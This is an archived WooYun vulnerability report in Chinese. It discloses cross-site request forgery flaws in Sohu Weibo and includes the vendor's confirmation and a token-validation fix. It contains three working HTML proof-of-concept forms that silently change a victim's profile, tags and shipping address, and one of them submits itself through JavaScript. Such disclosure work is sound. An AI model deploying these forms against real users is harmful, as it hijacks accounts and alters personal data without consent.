搜狐微博CSRF漏洞 | wooyun-2014-051233

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-051233

漏洞标题：

搜狐微博CSRF漏洞

漏洞详情

披露状态：

2014-02-18：细节已通知厂商并且等待厂商处理中
2014-02-18：厂商已经确认，细节仅向厂商公开
2014-02-28：细节向核心白帽子及相关领域专家公开
2014-03-10：细节向普通白帽子公开
2014-03-20：细节向实习白帽子公开
2014-04-04：细节向公众公开

简要描述：

搜狐微博的csrf漏洞，不知道能有多少rank呢，求礼物啊

详细说明：

No.1 昵称和个人资料基本资料被修改CSRF。

<script>
	function randomUName(){
		var uname=document.createElement("input");
		uname.type="hidden";
		uname.name="username";
		var nameValue=encodeURIComponent(("卧室SB"+Math.random()*1000000000).substr(0,10)+"号");
		uname.value=nameValue;
		document.getElementById("modifyInfo").appendChild(uname);
		document.getElementById("modifyInfo").submit();
	}
  </script>
  <form action="http://t.sohu.com/settings/base/set" method="POST" id="modifyInfo">
      <input type="hidden" name="sex" value="1" />
      <input type="hidden" name="schoolid" value="0" />
      <input type="hidden" name="areaid" value="0" />
      <input type="hidden" name="email" value="daliang987&#64;126&#46;com" />
      <input type="hidden" name="description" value="just for fun!
&#37;E4&#37;BD&#37;A0&#37;E7&#37;9A&#37;84&#37;E8&#37;B5&#37;84&#37;E6&#37;96&#37;99&#37;E8&#37;A2&#37;AB&#37;E6
&#37;94&#37;B9&#37;E5&#37;86&#37;99&#37;E4&#37;BA&#37;86&#37;EF&#37;BC&#37;81&#37;E5&#37;91&#37;B5&#37;E5&#37;91&
#37;B5&#37;E5&#37;91&#37;B5" />
      <input type="hidden" name="year" value="1989" />
      <input type="hidden" name="month" value="11" />
      <input type="hidden" name="day" value="25" />
      <input type="hidden" name="country" value="" />
      <input type="hidden" name="realName" value="" />
      <input type="hidden" name="cardType" value="1" />
      <input type="hidden" name="cardId" value="" />
      <input type="hidden" name="proc" value="1" />
      <input type="hidden" name="city" value="5" />
    </form>

证明：

谁点谁知道。。。

No.2 标签修改CSRF

<html>
  <!-- CSRF PoC - generated by burp suite professional -->
  <body>
    <form action="http://t.sohu.com/settings/tag/addTag" method="POST">
      <input type="hidden" name="tagname" value="adm1nSB" />
      <input type="hidden" name="tagtype" value="0" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

证明：

No.3 收货地址CSRF

<body>
    <form action="http://t.sohu.com/settings/address/set" method="POST">
      <input type="hidden" name="contactInfoRealName" value="&#37;E7&#37;8E&#37;8B&#37;E5&#37;B0&#37;BC&#37;E7&#37;8E&#37;9B" />
      <input type="hidden" name="contactInfoMobile" value="18622221111" />
      <input type="hidden" name="contactInfoProvince" value="1" />
      <input type="hidden" name="contactInfoCity" value="1" />
      <input type="hidden" name="contactInfoAddress" value="&#37;E4&#37;B8&#37;8D&#37;E7&#37;9F&#37;A5&#37;E9&#37;81&#37;93&#37;E5&#37;95&#37;8A" />
      <input type="hidden" name="contactInfoZipCode" value="101000" />
      <input type="submit" value="Submit form" />
    </form>
  </body>

漏洞证明：

以上主要就是针对资料修改的一些csrf，求礼物啊

修复方案：

token验证

版权声明：转载请注明来源大亮@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2014-02-18 17:02

厂商回复：

感谢对搜狐安全的支持。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源大亮@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 大亮@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源大亮@乌云